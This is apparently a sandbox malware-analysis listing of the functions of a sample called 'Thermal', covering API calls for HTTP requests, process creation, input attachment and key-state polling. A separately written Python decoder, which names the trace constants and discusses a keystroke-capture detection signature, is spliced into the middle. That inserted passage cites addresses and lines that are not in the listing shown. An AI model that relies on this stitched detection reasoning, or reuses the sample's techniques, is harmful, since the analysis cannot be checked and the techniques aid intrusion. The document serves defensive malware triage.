                                                • Opcode Fuzzy Hash: 3b1858b6664ca1b3c3e989c102020d4dc7e1c9de3efc7c2f3912b489dcde0d72
                                                • Instruction Fuzzy Hash: 1B21C170940204BBCF04EBA0DC89EFEBBB9EF95310F50025AF96193291EB7958159B20
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007C9CB5
                                                • GetDlgCtrlID.USER32 ref: 007C9CC0
                                                • GetParent.USER32 ref: 007C9CDC
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9CDF
                                                • GetDlgCtrlID.USER32(?), ref: 007C9CE8
                                                • GetParent.USER32(?), ref: 007C9D04
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9D07
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: 7f0a93da48744cd75a9da76b7c873e8ab4f134e8ccb144190f55e0c17626d64c
                                                • Instruction ID: abec542faebebdc4988d6bf674f3035a6fd95b87b7908d869780c1b0496dcd10
                                                • Opcode Fuzzy Hash: 7f0a93da48744cd75a9da76b7c873e8ab4f134e8ccb144190f55e0c17626d64c
                                                • Instruction Fuzzy Hash: EA21A175A40204BBDF54ABB0CC89FFEBBB9EF94300F500119B96197291EB7989259B20
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007E8FC1
                                                • CoInitialize.OLE32(00000000), ref: 007E8FEE
                                                • CoUninitialize.OLE32 ref: 007E8FF8
                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 007E90F8
                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 007E9225
                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00803BDC), ref: 007E9259
                                                • CoGetObject.OLE32(?,00000000,00803BDC,?), ref: 007E927C
                                                • SetErrorMode.KERNEL32(00000000), ref: 007E928F
                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007E930F
                                                • VariantClear.OLEAUT32(?), ref: 007E931F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                • String ID:
                                                • API String ID: 2395222682-0
                                                • Opcode ID: afbf60e2fc6bd1119ba0afaa8342cca08efc3a4103f494cc65cdc5e8fc298e13
                                                • Instruction ID: 6349fdbc07074a89d64d6296bbec5ddc9c05139d1d1c5db976d0e562e139f547
                                                • Opcode Fuzzy Hash: afbf60e2fc6bd1119ba0afaa8342cca08efc3a4103f494cc65cdc5e8fc298e13
                                                • Instruction Fuzzy Hash: 82C11372608345AFC740DF65C88892AB7E9FF89348F00491DFA8A9B251DB75ED05CB52
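The numeric arguments in these listings are raw stack slots, and naming the constants is the first step in reading the functions above. What follows is an added example, not part of the Joe Sandbox report or of the analysed sample: a small Python decoder that parses trace lines of the form shown on this page and resolves the constants that matter for triage. It covers the keyboard-state function (0xA0, 0xA1, 0x11, 0x12 and 0x5B are VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU and VK_LWIN, i.e. only modifier keys), the two ListBox/ComboBox functions (0x018C LB_SELECTSTRING and 0x0186 LB_SETCURSEL, each followed by 0x0111 WM_COMMAND to the parent), the SetErrorMode(1) = SEM_FAILCRITICALERRORS bracket around GetDiskFreeSpaceW, the MF_BYPOSITION flag in CheckMenuRadioItem, and the CLSCTX values passed to CoCreateInstance (0x17 = CLSCTX_ALL) and CoGetInstanceFromFile (0x15 = CLSCTX_SERVER). The sample input is constructed from lines copied off this page; the regular expression, and the decision to scan every slot of SendMessageW for a known message code because the listing does not keep the message in a fixed slot (compare refs 007C9BF6 and 007C9C1E above), are assumptions about the listing format.

```python
import re

# Win32/COM constants for the arguments worth decoding (values from the SDK headers).
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
MODIFIER_VKS = frozenset(VK_NAMES)  # every entry above is a modifier key
MSG_NAMES = {0x0111: "WM_COMMAND", 0x0186: "LB_SETCURSEL", 0x018C: "LB_SELECTSTRING",
             0x1004: "LVM_GETITEMCOUNT", 0x101F: "LVM_GETHEADER"}
SEM_FLAGS = {0x1: "SEM_FAILCRITICALERRORS", 0x2: "SEM_NOGPFAULTERRORBOX", 0x8000: "SEM_NOOPENFILEERRORBOX"}
GWL_NAMES = {0xF0: "GWL_STYLE", 0xEC: "GWL_EXSTYLE"}  # the listing shows only the low byte of -16 / -20
CLSCTX_NAMES = {0x15: "CLSCTX_SERVER", 0x17: "CLSCTX_ALL"}

# Assumed line format: "• Name.MODULE(arg,...), ref: ADDR". Parentheses are absent when no
# arguments were recorded; "Part of subcall function" lines deliberately do not match.
CALL_RE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")


def _arg(tok):
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"-?[0-9A-F]{8}", tok) else tok  # "?" or a string like READY


def parse_trace(text):
    """Parse listing lines into dicts with name, module, args (ints where resolvable) and ref."""
    calls = []
    for m in filter(None, map(CALL_RE.match, text.splitlines())):
        name, module, raw, ref = m.groups()
        args = [_arg(a) for a in raw.split(",")] if raw else []
        calls.append({"name": name, "module": module, "args": args, "ref": ref.upper()})
    return calls


def _slot(args, i):
    return args[i] if i < len(args) and isinstance(args[i], int) else None


def decode_call(name, args):
    """Symbolic reading of the argument that matters for this API, or None."""
    ints = [a for a in args if isinstance(a, int)]
    if name in ("GetAsyncKeyState", "GetKeyState") and ints:
        return VK_NAMES.get(ints[0], "VK_%02X" % ints[0])
    if name == "SendMessageW":
        # Slot order is not stable in these listings (the message code sits in slot 1, 2 or 3
        # on this page), so accept a known message code from any slot before falling back.
        known = [MSG_NAMES[v] for v in ints if v in MSG_NAMES]
        return known[0] if known else (None if _slot(args, 1) is None else "msg 0x%04X" % _slot(args, 1))
    if name == "SetErrorMode" and ints:
        flags = [n for bit, n in SEM_FLAGS.items() if ints[0] & bit]
        return "|".join(flags) if flags else "0 (restore default error mode)"
    if name == "Sleep" and ints:
        return "%d ms" % ints[0]
    if name == "GetWindowLongW" and _slot(args, 1) is not None:
        return GWL_NAMES.get(_slot(args, 1) & 0xFF, "index 0x%X" % _slot(args, 1))
    if name == "CheckMenuRadioItem" and 0x400 in ints:
        return "MF_BYPOSITION"
    if name == "CoCreateInstance":
        return CLSCTX_NAMES.get(_slot(args, 2))
    if name == "CoGetInstanceFromFile":
        return CLSCTX_NAMES.get(_slot(args, 3))
    return None


def decode_trace(text):
    """parse_trace() plus a 'note' field holding the decoded constant (None where not applicable)."""
    calls = parse_trace(text)
    for c in calls:
        c["note"] = decode_call(c["name"], c["args"])
    return calls


def polled_keys(text):
    """Virtual-key codes read via GetAsyncKeyState/GetKeyState, and whether all of them are
    modifiers. Polling only shift/ctrl/alt/win is what input-synthesis code does before it
    sends keys; on its own it does not show that typed characters are captured."""
    keys = {c["args"][0] for c in parse_trace(text)
            if c["name"] in ("GetAsyncKeyState", "GetKeyState") and _slot(c["args"], 0) is not None}
    return keys, bool(keys) and keys <= MODIFIER_VKS


# Constructed sample: trace lines copied from the function listings above.
SAMPLE = """\
• GetAsyncKeyState.USER32(000000A0), ref: 007D05B1
• GetKeyState.USER32(000000A0), ref: 007D05CC
• GetAsyncKeyState.USER32(000000A1), ref: 007D05E6
• GetAsyncKeyState.USER32(00000011), ref: 007D0613
• GetAsyncKeyState.USER32(00000012), ref: 007D063D
• GetAsyncKeyState.USER32(0000005B), ref: 007D0667
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007C9BCC
• GetDlgCtrlID.USER32 ref: 007C9BD7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9BF6
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007C9CB5
• GetWindowLongW.USER32(?,000000F0), ref: 007F75F1
• Sleep.KERNEL32(000001F4), ref: 007D2D92
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007D2EA7
• SetErrorMode.KERNEL32(00000001), ref: 007DBB13
• SetErrorMode.KERNEL32(00000000,READY), ref: 007DBC00
• CoCreateInstance.OLE32(?,00000000,00000017,00803BBC,?), ref: 007E8B58
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00803BDC), ref: 007E9259
"""

if __name__ == "__main__":
    for c in decode_trace(SAMPLE):
        if c["note"]:
            print("%s %-22s %s" % (c["ref"], c["name"], c["note"]))
    keys, only_mods = polled_keys(SAMPLE)
    print("polled keys:", sorted("0x%02X" % k for k in keys), "modifiers only:", only_mods)
```

The modifier check is the caveat worth carrying into a verdict: the "retrieve information about pressed keystrokes" signature fires on GetAsyncKeyState/GetKeyState, but the function at 007D0530 polls exactly the five modifier codes and nothing from the printable range, which is the pattern of code that synthesises input, so keystroke capture has to be established elsewhere (a hook, or a loop over the full key range) rather than from this function alone.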
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 007D19EF
                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A03
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 007D1A0A
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A19
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 007D1A2B
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A44
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A56
                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A9B
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1AB0
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1ABB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                • String ID:
                                                • API String ID: 2156557900-0
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 0077260D
                                                • SetTextColor.GDI32(?,000000FF), ref: 00772617
                                                • SetBkMode.GDI32(?,00000001), ref: 0077262C
                                                • GetStockObject.GDI32(00000005), ref: 00772634
                                                • GetClientRect.USER32(?), ref: 007AC0FC
                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 007AC113
                                                • GetWindowDC.USER32(?), ref: 007AC11F
                                                • GetPixel.GDI32(00000000,?,?), ref: 007AC12E
                                                • ReleaseDC.USER32(?,00000000), ref: 007AC140
                                                • GetSysColor.USER32(00000005), ref: 007AC15E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                • String ID:
                                                • API String ID: 3430376129-0
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0077ADE1
                                                • OleUninitialize.OLE32(?,00000000), ref: 0077AE80
                                                • UnregisterHotKey.USER32(?), ref: 0077AFD7
                                                • DestroyWindow.USER32(?), ref: 007B2F64
                                                • FreeLibrary.KERNEL32(?), ref: 007B2FC9
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007B2FF6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 469580280-3243417748
                                                APIs
                                                • EnumChildWindows.USER32(?,007CB13A), ref: 007CB078
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ChildEnumWindows
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 3555792229-1603158881
                                                APIs
                                                • SetWindowLongW.USER32(?,000000EB), ref: 0077327E
                                                  • Part of subcall function 0077218F: GetClientRect.USER32(?,?), ref: 007721B8
                                                  • Part of subcall function 0077218F: GetWindowRect.USER32(?,?), ref: 007721F9
                                                  • Part of subcall function 0077218F: ScreenToClient.USER32(?,?), ref: 00772221
                                                • GetDC.USER32 ref: 007AD073
                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007AD086
                                                • SelectObject.GDI32(00000000,00000000), ref: 007AD094
                                                • SelectObject.GDI32(00000000,00000000), ref: 007AD0A9
                                                • ReleaseDC.USER32(?,00000000), ref: 007AD0B1
                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007AD13C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                • String ID: U
                                                • API String ID: 4009187628-3372436214
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                  • Part of subcall function 00772714: GetCursorPos.USER32(?), ref: 00772727
                                                  • Part of subcall function 00772714: ScreenToClient.USER32(008377B0,?), ref: 00772744
                                                  • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000001), ref: 00772769
                                                  • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000002), ref: 00772777
                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 007FC69C
                                                • ImageList_EndDrag.COMCTL32 ref: 007FC6A2
                                                • ReleaseCapture.USER32 ref: 007FC6A8
                                                • SetWindowTextW.USER32(?,00000000), ref: 007FC752
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007FC765
                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 007FC847
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                • API String ID: 1924731296-2107944366
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E211C
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007E2148
                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007E218A
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007E219F
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E21AC
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007E21DC
                                                • InternetCloseHandle.WININET(00000000), ref: 007E2223
                                                  • Part of subcall function 007E2B4F: GetLastError.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B64
                                                  • Part of subcall function 007E2B4F: SetEvent.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B79
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                • String ID:
                                                • API String ID: 2603140658-3916222277
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00800980), ref: 007E9412
                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00800980), ref: 007E9446
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007E95C0
                                                • SysFreeString.OLEAUT32(?), ref: 007E95EA
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                • String ID:
                                                • API String ID: 560350794-0
                                                APIs
                                                • _memset.LIBCMT ref: 007EFD9E
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF31
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF55
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF95
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EFFB7
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007F0133
                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007F0165
                                                • CloseHandle.KERNEL32(?), ref: 007F0194
                                                • CloseHandle.KERNEL32(?), ref: 007F020B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                • String ID:
                                                • API String ID: 4090791747-0
                                                APIs
                                                  • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D3B8A,?), ref: 007D4BE0
                                                  • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D3B8A,?), ref: 007D4BF9
                                                  • Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                • lstrcmpiW.KERNEL32(?,?), ref: 007D52FB
                                                • _wcscmp.LIBCMT ref: 007D5315
                                                • MoveFileW.KERNEL32(?,?), ref: 007D5330
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                • String ID:
                                                • API String ID: 793581249-0
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007F8D24
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007AC638
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007AC65A
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007AC672
                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007AC690
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007AC6B1
                                                • DestroyIcon.USER32(00000000), ref: 007AC6C0
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007AC6DD
                                                • DestroyIcon.USER32(?), ref: 007AC6EC
                                                  • Part of subcall function 007FAAD4: DeleteObject.GDI32(00000000), ref: 007FAB0D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                • String ID:
                                                • API String ID: 2819616528-0
                                                • Opcode ID: 12bedcb77c302444520a588d81e5800effea0df870069f8e439949c4a3e9ee7c
                                                • Instruction ID: 2612a8633651fff21989dcc968745ef678602e0311ec7e33e95266e4b240337e
                                                • Opcode Fuzzy Hash: 12bedcb77c302444520a588d81e5800effea0df870069f8e439949c4a3e9ee7c
                                                • Instruction Fuzzy Hash: EA514770600209EFDF24DF24CC49BAA77B5FB84750F108A28F956A72A0DB79E991DB50
                                                APIs
                                                  • Part of subcall function 007CB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CB54D
                                                  • Part of subcall function 007CB52D: GetCurrentThreadId.KERNEL32 ref: 007CB554
